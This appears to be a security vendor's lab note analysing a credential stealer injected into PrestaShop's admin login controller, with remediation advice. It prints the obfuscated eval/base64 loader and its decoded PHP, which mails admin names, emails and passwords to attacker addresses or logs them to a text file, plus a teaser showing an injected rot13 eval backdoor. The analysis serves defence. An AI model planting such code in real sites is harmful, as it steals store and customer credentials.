PrestaShop Login Stealer

Labs Note

Lately, we’ve noticed an increase of login credentials stealing attempts and techniques targeting e-commerce based websites. These websites usually have sensitive information (credit card & back-end credentials) that would allow attackers to take advantage of the information & infected website.

This post will uncover a different technique being used against PrestaShop solutions. The technique varies from the one we described in this blog post here.

In this case, attackers also used the ‘./controllers/admin/AdminLoginController.php’ file but they injected a different malicious code:

eval(gzinflate(base64_decode("VZBvS8MwEMbfD/YdjlJICz<CONTENT EDITED>UfYHOdgoOBMMc2fGNdObtLF82f9d5p/AQ==")));

Here is the decoded version of the malicious code:

<?phpif(function_exists("mail")){    $listo = array( 'eNyong' => 'a<removed>@<removed>mail.com', 'Dowoh' => 'm<removed>l@<removed>mail.com');    foreach($listo as $ming => $imel){        mail($imel,'Setoran Admin '.$_SERVER['HTTPHOST'].' ^^',"Kye Pak $ming,nnNama: ".$employee->firstname." ".$employee->lastname."nEmail: $emailnPassword: $passwd");    }}else{$f=fopen('uspas.txt','a');fwrite($f,"imel:$email | pass: $passwdn");fclose($f);}?>

The attackers used an interesting conditional statement that would give them the information they were after regardless of server limitations. In other words, they were checking if the server had mailing capabilities to send all the sensitive data to a specific address but if it didn’t, it would simply write into the system a file called ‘uspas.txt’ with the username and password.

From there attackers could just choose between checking the e-mail or accessing the .txt file into the victim’s website.

In case of a compromise, we should consider that all user accounts and their personal information were stolen, therefore it’s recommended changing all passwords from the back-end, cPanel, SFTP and other connection mechanisms that could give attackers any leverage.

Business’s reputation can be damaged if any sensitive information or unauthorized use of customer’s credits card information fall into the wrong hands, therefore keeping good security practices, such as having a File Integrity Monitoring, Web Application Firewall and other methods will help reducing the risks of infection.

You May Also Like

CACHE START Russian Spam

We see quite a few sites with the following injected PHP code: //###=CACHE START=### error_reporting(0); $strings = “as”;$strings .= “sert”; @$strings(str_rot13(‘riny(onfr64_qrpbqr(“nJLtXTymp2I0XPEcLaLcXF…skipped…Tyvqwg9”));’)); //###=CACHE END=### This malware…
Read the Post